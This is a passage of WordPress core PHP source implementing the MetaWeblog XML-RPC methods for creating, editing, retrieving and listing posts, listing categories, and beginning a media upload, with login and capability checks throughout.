* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content structure.
* @type int $4 Optional. Publish flag. 0 for draft, 1 for publish. Default 0.
* }
* @return int|IXR_Error
*/
public function mw_newPost( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$publish = isset( $args[4] ) ? $args[4] : 0;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.newPost', $args, $this );
$page_template = '';
if ( ! empty( $content_struct['post_type'] ) ) {
if ( 'page' === $content_struct['post_type'] ) {
if ( $publish ) {
$cap = 'publish_pages';
} elseif ( isset( $content_struct['page_status'] ) && 'publish' === $content_struct['page_status'] ) {
$cap = 'publish_pages';
} else {
$cap = 'edit_pages';
}
$error_message = __( 'Sorry, you are not allowed to publish pages on this site.' );
$post_type = 'page';
if ( ! empty( $content_struct['wp_page_template'] ) ) {
$page_template = $content_struct['wp_page_template'];
}
} elseif ( 'post' === $content_struct['post_type'] ) {
if ( $publish ) {
$cap = 'publish_posts';
} elseif ( isset( $content_struct['post_status'] ) && 'publish' === $content_struct['post_status'] ) {
$cap = 'publish_posts';
} else {
$cap = 'edit_posts';
}
$error_message = __( 'Sorry, you are not allowed to publish posts on this site.' );
$post_type = 'post';
} else {
// No other 'post_type' values are allowed here.
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
} else {
if ( $publish ) {
$cap = 'publish_posts';
} elseif ( isset( $content_struct['post_status'] ) && 'publish' === $content_struct['post_status'] ) {
$cap = 'publish_posts';
} else {
$cap = 'edit_posts';
}
$error_message = __( 'Sorry, you are not allowed to publish posts on this site.' );
$post_type = 'post';
}
if ( ! current_user_can( get_post_type_object( $post_type )->cap->create_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish posts on this site.' ) );
}
if ( ! current_user_can( $cap ) ) {
return new IXR_Error( 401, $error_message );
}
// Check for a valid post format if one was given.
if ( isset( $content_struct['wp_post_format'] ) ) {
$content_struct['wp_post_format'] = sanitize_key( $content_struct['wp_post_format'] );
if ( ! array_key_exists( $content_struct['wp_post_format'], get_post_format_strings() ) ) {
return new IXR_Error( 404, __( 'Invalid post format.' ) );
}
}
// Let WordPress generate the 'post_name' (slug) unless
// one has been provided.
$post_name = null;
if ( isset( $content_struct['wp_slug'] ) ) {
$post_name = $content_struct['wp_slug'];
}
// Only use a password if one was given.
$post_password = '';
if ( isset( $content_struct['wp_password'] ) ) {
$post_password = $content_struct['wp_password'];
}
// Only set a post parent if one was given.
$post_parent = 0;
if ( isset( $content_struct['wp_page_parent_id'] ) ) {
$post_parent = $content_struct['wp_page_parent_id'];
}
// Only set the 'menu_order' if it was given.
$menu_order = 0;
if ( isset( $content_struct['wp_page_order'] ) ) {
$menu_order = $content_struct['wp_page_order'];
}
$post_author = $user->ID;
// If an author ID was provided then use it instead.
if ( isset( $content_struct['wp_author_id'] ) && ( $user->ID !== (int) $content_struct['wp_author_id'] ) ) {
switch ( $post_type ) {
case 'post':
if ( ! current_user_can( 'edit_others_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create posts as this user.' ) );
}
break;
case 'page':
if ( ! current_user_can( 'edit_others_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to create pages as this user.' ) );
}
break;
default:
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
$author = get_userdata( $content_struct['wp_author_id'] );
if ( ! $author ) {
return new IXR_Error( 404, __( 'Invalid author ID.' ) );
}
$post_author = $content_struct['wp_author_id'];
}
$post_title = isset( $content_struct['title'] ) ? $content_struct['title'] : '';
$post_content = isset( $content_struct['description'] ) ? $content_struct['description'] : '';
$post_status = $publish ? 'publish' : 'draft';
if ( isset( $content_struct[ "{$post_type}_status" ] ) ) {
switch ( $content_struct[ "{$post_type}_status" ] ) {
case 'draft':
case 'pending':
case 'private':
case 'publish':
$post_status = $content_struct[ "{$post_type}_status" ];
break;
default:
// Deliberably left empty.
break;
}
}
$post_excerpt = isset( $content_struct['mt_excerpt'] ) ? $content_struct['mt_excerpt'] : '';
$post_more = isset( $content_struct['mt_text_more'] ) ? $content_struct['mt_text_more'] : '';
$tags_input = isset( $content_struct['mt_keywords'] ) ? $content_struct['mt_keywords'] : array();
if ( isset( $content_struct['mt_allow_comments'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_comments'] ) ) {
switch ( $content_struct['mt_allow_comments'] ) {
case 'closed':
$comment_status = 'closed';
break;
case 'open':
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_comments'] ) {
case 0:
case 2:
$comment_status = 'closed';
break;
case 1:
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
}
} else {
$comment_status = get_default_comment_status( $post_type );
}
if ( isset( $content_struct['mt_allow_pings'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_pings'] ) ) {
switch ( $content_struct['mt_allow_pings'] ) {
case 'closed':
$ping_status = 'closed';
break;
case 'open':
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_pings'] ) {
case 0:
$ping_status = 'closed';
break;
case 1:
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
}
} else {
$ping_status = get_default_comment_status( $post_type, 'pingback' );
}
if ( $post_more ) {
$post_content .= '<!--more-->' . $post_more;
}
$to_ping = '';
if ( isset( $content_struct['mt_tb_ping_urls'] ) ) {
$to_ping = $content_struct['mt_tb_ping_urls'];
if ( is_array( $to_ping ) ) {
$to_ping = implode( ' ', $to_ping );
}
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $content_struct['dateCreated'] ) ) {
$date_created = $content_struct['dateCreated']->getIso();
}
$post_date = '';
$post_date_gmt = '';
if ( ! empty( $date_created ) ) {
$post_date = iso8601_to_datetime( $date_created );
$post_date_gmt = iso8601_to_datetime( $date_created, 'gmt' );
}
$post_category = array();
if ( isset( $content_struct['categories'] ) ) {
$catnames = $content_struct['categories'];
if ( is_array( $catnames ) ) {
foreach ( $catnames as $cat ) {
$post_category[] = get_cat_ID( $cat );
}
}
}
$postdata = compact(
'post_author',
'post_date',
'post_date_gmt',
'post_content',
'post_title',
'post_category',
'post_status',
'post_excerpt',
'comment_status',
'ping_status',
'to_ping',
'post_type',
'post_name',
'post_password',
'post_parent',
'menu_order',
'tags_input',
'page_template'
);
$post_id = get_default_post_to_edit( $post_type, true )->ID;
$postdata['ID'] = $post_id;
// Only posts can be sticky.
if ( 'post' === $post_type && isset( $content_struct['sticky'] ) ) {
$data = $postdata;
$data['sticky'] = $content_struct['sticky'];
$error = $this->_toggle_sticky( $data );
if ( $error ) {
return $error;
}
}
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $content_struct['custom_fields'] );
}
if ( isset( $content_struct['wp_post_thumbnail'] ) ) {
if ( set_post_thumbnail( $post_id, $content_struct['wp_post_thumbnail'] ) === false ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
unset( $content_struct['wp_post_thumbnail'] );
}
// Handle enclosures.
$enclosure = isset( $content_struct['enclosure'] ) ? $content_struct['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_content );
/*
* Handle post formats if assigned, value is validated earlier
* in this function.
*/
if ( isset( $content_struct['wp_post_format'] ) ) {
set_post_format( $post_id, $content_struct['wp_post_format'] );
}
$post_id = wp_insert_post( $postdata, true );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be created.' ) );
}
/**
* Fires after a new post has been successfully created via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $post_id ID of the new post.
* @param array $args An array of arguments to create the new post.
*/
do_action( 'xmlrpc_call_success_mw_newPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return (string) $post_id;
}
/**
* Adds an enclosure to a post if it's new.
*
* @since 2.8.0
*
* @param int $post_id Post ID.
* @param array $enclosure Enclosure data.
*/
public function add_enclosure_if_new( $post_id, $enclosure ) {
if ( is_array( $enclosure ) && isset( $enclosure['url'] ) && isset( $enclosure['length'] ) && isset( $enclosure['type'] ) ) {
$encstring = $enclosure['url'] . "\n" . $enclosure['length'] . "\n" . $enclosure['type'] . "\n";
$found = false;
$enclosures = get_post_meta( $post_id, 'enclosure' );
if ( $enclosures ) {
foreach ( $enclosures as $enc ) {
// This method used to omit the trailing new line. #23219
if ( rtrim( $enc, "\n" ) === rtrim( $encstring, "\n" ) ) {
$found = true;
break;
}
}
}
if ( ! $found ) {
add_post_meta( $post_id, 'enclosure', $encstring );
}
}
}
/**
* Attaches an upload to a post.
*
* @since 2.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $post_id Post ID.
* @param string $post_content Post Content for attachment.
*/
public function attach_uploads( $post_id, $post_content ) {
global $wpdb;
// Find any unattached files.
$attachments = $wpdb->get_results( "SELECT ID, guid FROM {$wpdb->posts} WHERE post_parent = '0' AND post_type = 'attachment'" );
if ( is_array( $attachments ) ) {
foreach ( $attachments as $file ) {
if ( ! empty( $file->guid ) && str_contains( $post_content, $file->guid ) ) {
$wpdb->update( $wpdb->posts, array( 'post_parent' => $post_id ), array( 'ID' => $file->ID ) );
}
}
}
}
/**
* Edits a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content structure.
* @type int $4 Optional. Publish flag. 0 for draft, 1 for publish. Default 0.
* }
* @return true|IXR_Error True on success.
*/
public function mw_editPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$publish = isset( $args[4] ) ? $args[4] : 0;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.editPost', $args, $this );
$postdata = get_post( $post_id, ARRAY_A );
/*
* If there is no post data for the give post ID, stop now and return an error.
* Otherwise a new post will be created (which was the old behavior).
*/
if ( ! $postdata || empty( $postdata['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
// Use wp.editPost to edit post types other than post and page.
if ( ! in_array( $postdata['post_type'], array( 'post', 'page' ), true ) ) {
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
// Thwart attempt to change the post type.
if ( ! empty( $content_struct['post_type'] ) && ( $content_struct['post_type'] !== $postdata['post_type'] ) ) {
return new IXR_Error( 401, __( 'The post type may not be changed.' ) );
}
// Check for a valid post format if one was given.
if ( isset( $content_struct['wp_post_format'] ) ) {
$content_struct['wp_post_format'] = sanitize_key( $content_struct['wp_post_format'] );
if ( ! array_key_exists( $content_struct['wp_post_format'], get_post_format_strings() ) ) {
return new IXR_Error( 404, __( 'Invalid post format.' ) );
}
}
$this->escape( $postdata );
$post_id = $postdata['ID'];
$post_content = $postdata['post_content'];
$post_title = $postdata['post_title'];
$post_excerpt = $postdata['post_excerpt'];
$post_password = $postdata['post_password'];
$post_parent = $postdata['post_parent'];
$post_type = $postdata['post_type'];
$menu_order = $postdata['menu_order'];
$ping_status = $postdata['ping_status'];
$comment_status = $postdata['comment_status'];
// Let WordPress manage slug if none was provided.
$post_name = $postdata['post_name'];
if ( isset( $content_struct['wp_slug'] ) ) {
$post_name = $content_struct['wp_slug'];
}
// Only use a password if one was given.
if ( isset( $content_struct['wp_password'] ) ) {
$post_password = $content_struct['wp_password'];
}
// Only set a post parent if one was given.
if ( isset( $content_struct['wp_page_parent_id'] ) ) {
$post_parent = $content_struct['wp_page_parent_id'];
}
// Only set the 'menu_order' if it was given.
if ( isset( $content_struct['wp_page_order'] ) ) {
$menu_order = $content_struct['wp_page_order'];
}
$page_template = '';
if ( ! empty( $content_struct['wp_page_template'] ) && 'page' === $post_type ) {
$page_template = $content_struct['wp_page_template'];
}
$post_author = $postdata['post_author'];
// If an author ID was provided then use it instead.
if ( isset( $content_struct['wp_author_id'] ) ) {
// Check permissions if attempting to switch author to or from another user.
if ( $user->ID !== (int) $content_struct['wp_author_id'] || $user->ID !== (int) $post_author ) {
switch ( $post_type ) {
case 'post':
if ( ! current_user_can( 'edit_others_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to change the post author as this user.' ) );
}
break;
case 'page':
if ( ! current_user_can( 'edit_others_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to change the page author as this user.' ) );
}
break;
default:
return new IXR_Error( 401, __( 'Invalid post type.' ) );
}
$post_author = $content_struct['wp_author_id'];
}
}
if ( isset( $content_struct['mt_allow_comments'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_comments'] ) ) {
switch ( $content_struct['mt_allow_comments'] ) {
case 'closed':
$comment_status = 'closed';
break;
case 'open':
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_comments'] ) {
case 0:
case 2:
$comment_status = 'closed';
break;
case 1:
$comment_status = 'open';
break;
default:
$comment_status = get_default_comment_status( $post_type );
break;
}
}
}
if ( isset( $content_struct['mt_allow_pings'] ) ) {
if ( ! is_numeric( $content_struct['mt_allow_pings'] ) ) {
switch ( $content_struct['mt_allow_pings'] ) {
case 'closed':
$ping_status = 'closed';
break;
case 'open':
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
} else {
switch ( (int) $content_struct['mt_allow_pings'] ) {
case 0:
$ping_status = 'closed';
break;
case 1:
$ping_status = 'open';
break;
default:
$ping_status = get_default_comment_status( $post_type, 'pingback' );
break;
}
}
}
if ( isset( $content_struct['title'] ) ) {
$post_title = $content_struct['title'];
}
if ( isset( $content_struct['description'] ) ) {
$post_content = $content_struct['description'];
}
$post_category = array();
if ( isset( $content_struct['categories'] ) ) {
$catnames = $content_struct['categories'];
if ( is_array( $catnames ) ) {
foreach ( $catnames as $cat ) {
$post_category[] = get_cat_ID( $cat );
}
}
}
if ( isset( $content_struct['mt_excerpt'] ) ) {
$post_excerpt = $content_struct['mt_excerpt'];
}
$post_more = isset( $content_struct['mt_text_more'] ) ? $content_struct['mt_text_more'] : '';
$post_status = $publish ? 'publish' : 'draft';
if ( isset( $content_struct[ "{$post_type}_status" ] ) ) {
switch ( $content_struct[ "{$post_type}_status" ] ) {
case 'draft':
case 'pending':
case 'private':
case 'publish':
$post_status = $content_struct[ "{$post_type}_status" ];
break;
default:
$post_status = $publish ? 'publish' : 'draft';
break;
}
}
$tags_input = isset( $content_struct['mt_keywords'] ) ? $content_struct['mt_keywords'] : array();
if ( 'publish' === $post_status || 'private' === $post_status ) {
if ( 'page' === $post_type && ! current_user_can( 'publish_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this page.' ) );
} elseif ( ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
}
if ( $post_more ) {
$post_content = $post_content . '<!--more-->' . $post_more;
}
$to_ping = '';
if ( isset( $content_struct['mt_tb_ping_urls'] ) ) {
$to_ping = $content_struct['mt_tb_ping_urls'];
if ( is_array( $to_ping ) ) {
$to_ping = implode( ' ', $to_ping );
}
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
} elseif ( ! empty( $content_struct['dateCreated'] ) ) {
$date_created = $content_struct['dateCreated']->getIso();
}
// Default to not flagging the post date to be edited unless it's intentional.
$edit_date = false;
if ( ! empty( $date_created ) ) {
$post_date = iso8601_to_datetime( $date_created );
$post_date_gmt = iso8601_to_datetime( $date_created, 'gmt' );
// Flag the post date to be edited.
$edit_date = true;
} else {
$post_date = $postdata['post_date'];
$post_date_gmt = $postdata['post_date_gmt'];
}
$newpost = array(
'ID' => $post_id,
);
$newpost += compact(
'post_content',
'post_title',
'post_category',
'post_status',
'post_excerpt',
'comment_status',
'ping_status',
'edit_date',
'post_date',
'post_date_gmt',
'to_ping',
'post_name',
'post_password',
'post_parent',
'menu_order',
'post_author',
'tags_input',
'page_template'
);
// We've got all the data -- post it.
$result = wp_update_post( $newpost, true );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be updated.' ) );
}
// Only posts can be sticky.
if ( 'post' === $post_type && isset( $content_struct['sticky'] ) ) {
$data = $newpost;
$data['sticky'] = $content_struct['sticky'];
$data['post_type'] = 'post';
$error = $this->_toggle_sticky( $data, true );
if ( $error ) {
return $error;
}
}
if ( isset( $content_struct['custom_fields'] ) ) {
$this->set_custom_fields( $post_id, $content_struct['custom_fields'] );
}
if ( isset( $content_struct['wp_post_thumbnail'] ) ) {
// Empty value deletes, non-empty value adds/updates.
if ( empty( $content_struct['wp_post_thumbnail'] ) ) {
delete_post_thumbnail( $post_id );
} else {
if ( set_post_thumbnail( $post_id, $content_struct['wp_post_thumbnail'] ) === false ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
}
unset( $content_struct['wp_post_thumbnail'] );
}
// Handle enclosures.
$enclosure = isset( $content_struct['enclosure'] ) ? $content_struct['enclosure'] : null;
$this->add_enclosure_if_new( $post_id, $enclosure );
$this->attach_uploads( $post_id, $post_content );
// Handle post formats if assigned, validation is handled earlier in this function.
if ( isset( $content_struct['wp_post_format'] ) ) {
set_post_format( $post_id, $content_struct['wp_post_format'] );
}
/**
* Fires after a post has been successfully updated via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $post_id ID of the updated post.
* @param array $args An array of arguments to update the post.
*/
do_action( 'xmlrpc_call_success_mw_editPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Retrieves a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mw_getPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$postdata = get_post( $post_id, ARRAY_A );
if ( ! $postdata ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getPost', $args, $this );
if ( '' !== $postdata['post_date'] ) {
$post_date = $this->_convert_date( $postdata['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $postdata['post_date_gmt'], $postdata['post_date'] );
$post_modified = $this->_convert_date( $postdata['post_modified'] );
$post_modified_gmt = $this->_convert_date_gmt( $postdata['post_modified_gmt'], $postdata['post_modified'] );
$categories = array();
$cat_ids = wp_get_post_categories( $post_id );
foreach ( $cat_ids as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
$tagnames = array();
$tags = wp_get_post_tags( $post_id );
if ( ! empty( $tags ) ) {
foreach ( $tags as $tag ) {
$tagnames[] = $tag->name;
}
$tagnames = implode( ', ', $tagnames );
} else {
$tagnames = '';
}
$post = get_extended( $postdata['post_content'] );
$link = get_permalink( $postdata['ID'] );
// Get the author info.
$author = get_userdata( $postdata['post_author'] );
$allow_comments = ( 'open' === $postdata['comment_status'] ) ? 1 : 0;
$allow_pings = ( 'open' === $postdata['ping_status'] ) ? 1 : 0;
// Consider future posts as published.
if ( 'future' === $postdata['post_status'] ) {
$postdata['post_status'] = 'publish';
}
// Get post format.
$post_format = get_post_format( $post_id );
if ( empty( $post_format ) ) {
$post_format = 'standard';
}
$sticky = false;
if ( is_sticky( $post_id ) ) {
$sticky = true;
}
$enclosure = array();
foreach ( (array) get_post_custom( $post_id ) as $key => $val ) {
if ( 'enclosure' === $key ) {
foreach ( (array) $val as $enc ) {
$encdata = explode( "\n", $enc );
$enclosure['url'] = trim( htmlspecialchars( $encdata[0] ) );
$enclosure['length'] = (int) trim( $encdata[1] );
$enclosure['type'] = trim( $encdata[2] );
break 2;
}
}
}
$resp = array(
'dateCreated' => $post_date,
'userid' => $postdata['post_author'],
'postid' => $postdata['ID'],
'description' => $post['main'],
'title' => $postdata['post_title'],
'link' => $link,
'permaLink' => $link,
// Commented out because no other tool seems to use this.
// 'content' => $entry['post_content'],
'categories' => $categories,
'mt_excerpt' => $postdata['post_excerpt'],
'mt_text_more' => $post['extended'],
'wp_more_text' => $post['more_text'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'mt_keywords' => $tagnames,
'wp_slug' => $postdata['post_name'],
'wp_password' => $postdata['post_password'],
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $post_date_gmt,
'post_status' => $postdata['post_status'],
'custom_fields' => $this->get_custom_fields( $post_id ),
'wp_post_format' => $post_format,
'sticky' => $sticky,
'date_modified' => $post_modified,
'date_modified_gmt' => $post_modified_gmt,
);
if ( ! empty( $enclosure ) ) {
$resp['enclosure'] = $enclosure;
}
$resp['wp_post_thumbnail'] = get_post_thumbnail_id( $postdata['ID'] );
return $resp;
} else {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
}
/**
* Retrieves list of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function mw_getRecentPosts( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$query = array( 'numberposts' => absint( $args[3] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getRecentPosts', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
return array();
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $entry['post_date_gmt'], $entry['post_date'] );
$post_modified = $this->_convert_date( $entry['post_modified'] );
$post_modified_gmt = $this->_convert_date_gmt( $entry['post_modified_gmt'], $entry['post_modified'] );
$categories = array();
$cat_ids = wp_get_post_categories( $entry['ID'] );
foreach ( $cat_ids as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
$tagnames = array();
$tags = wp_get_post_tags( $entry['ID'] );
if ( ! empty( $tags ) ) {
foreach ( $tags as $tag ) {
$tagnames[] = $tag->name;
}
$tagnames = implode( ', ', $tagnames );
} else {
$tagnames = '';
}
$post = get_extended( $entry['post_content'] );
$link = get_permalink( $entry['ID'] );
// Get the post author info.
$author = get_userdata( $entry['post_author'] );
$allow_comments = ( 'open' === $entry['comment_status'] ) ? 1 : 0;
$allow_pings = ( 'open' === $entry['ping_status'] ) ? 1 : 0;
// Consider future posts as published.
if ( 'future' === $entry['post_status'] ) {
$entry['post_status'] = 'publish';
}
// Get post format.
$post_format = get_post_format( $entry['ID'] );
if ( empty( $post_format ) ) {
$post_format = 'standard';
}
$recent_posts[] = array(
'dateCreated' => $post_date,
'userid' => $entry['post_author'],
'postid' => (string) $entry['ID'],
'description' => $post['main'],
'title' => $entry['post_title'],
'link' => $link,
'permaLink' => $link,
// Commented out because no other tool seems to use this.
// 'content' => $entry['post_content'],
'categories' => $categories,
'mt_excerpt' => $entry['post_excerpt'],
'mt_text_more' => $post['extended'],
'wp_more_text' => $post['more_text'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'mt_keywords' => $tagnames,
'wp_slug' => $entry['post_name'],
'wp_password' => $entry['post_password'],
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $post_date_gmt,
'post_status' => $entry['post_status'],
'custom_fields' => $this->get_custom_fields( $entry['ID'] ),
'wp_post_format' => $post_format,
'date_modified' => $post_modified,
'date_modified_gmt' => $post_modified_gmt,
'sticky' => ( 'post' === $entry['post_type'] && is_sticky( $entry['ID'] ) ),
'wp_post_thumbnail' => get_post_thumbnail_id( $entry['ID'] ),
);
}
return $recent_posts;
}
/**
* Retrieves the list of categories on a given blog.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mw_getCategories( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getCategories', $args, $this );
$categories_struct = array();
$cats = get_categories( array( 'get' => 'all' ) );
if ( $cats ) {
foreach ( $cats as $cat ) {
$struct = array();
$struct['categoryId'] = $cat->term_id;
$struct['parentId'] = $cat->parent;
$struct['description'] = $cat->name;
$struct['categoryDescription'] = $cat->description;
$struct['categoryName'] = $cat->name;
$struct['htmlUrl'] = esc_html( get_category_link( $cat->term_id ) );
$struct['rssUrl'] = esc_html( get_category_feed_link( $cat->term_id, 'rss2' ) );
$categories_struct[] = $struct;
}
}
return $categories_struct;
}
/**
* Uploads a file, following your settings.
*
* Adapted from a patch by Johann Richard.
*
* @link http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Data.
* }
* @return array|IXR_Error
*/
public function mw_newMediaObject( $args ) {
$username = $this->escape( $args[1] );
$password = $this->escape( $args[2] );
$data = $args[3];
$name = sanitize_file_name( $data['name'] );
$type = $data['type'];
$bits = $data['bits'];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.newMediaObject', $args, $this );
if ( ! current_user_can( 'upload_files' ) ) {
$this->error = new IXR_Error( 401, __( 'Sorry, you are not allowed to upload files.' ) );
return $this->error;
}
if ( is_multisite() && upload_is_user_over_quota( false ) ) {
$this->error = new IXR_Error(
401,
sprintf(
/* translators: %s: Allowed space allocation. */
__( 'Sorry, you have used your space allocation of %s. Please delete some files to upload more files.' ),
size_format( get_space_allowed() * MB_IN_BYTES )
)
);
return $this->error;
}
/**
* Filters whether to preempt the XML-RPC media upload.
*
* Returning a truthy value will effectively short-circuit the media upload,
* returning that value as a 500 error instead.
*
* @since 2.1.0
*
* @param bool $error Whether to pre-empt the media upload. Default false.
*/
$upload_err = apply_filters( 'pre_upload_error', false );
if ( $upload_err ) {
return new IXR_Error( 500, $upload_err );
}
$upload = wp_upload_bits( $name, null, $bits );
if ( ! empty( $upload['error'] ) ) {
/* translators: 1: File name, 2: Error message. */
$error_string = sprintf( __( 'Could not write file %1$s (%2$s).' ), $name, $upload['error'] );
return new IXR_Error( 500, $error_string );
}
// Construct the attachment array.
$post_id = 0;
if ( ! empty( $data['post_id'] ) ) {
$post_id = (int) $data['post_id'];
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
}
$attachment = array(
'post_title' => $name,
'post_content' => '',
'post_type' => 'attachment',
'post_parent' => $post_id,
'post_mime_type' => $type,
'guid' => $upload['url'],
);
// Save the data.
$attachment_id = wp_insert_attachment( $attachment, $upload['file'], $post_id );
wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
/**
* Fires after a new attachment has been added via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $attachment_id ID of the new attachment.
* @param array $args An array of arguments to add the attachment.
*/
do_action( 'xmlrpc_call_success_mw_newMediaObject', $attachment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
$struct = $this->_prepare_media_item( get_post( $attachment_id ) );
// Deprecated values.
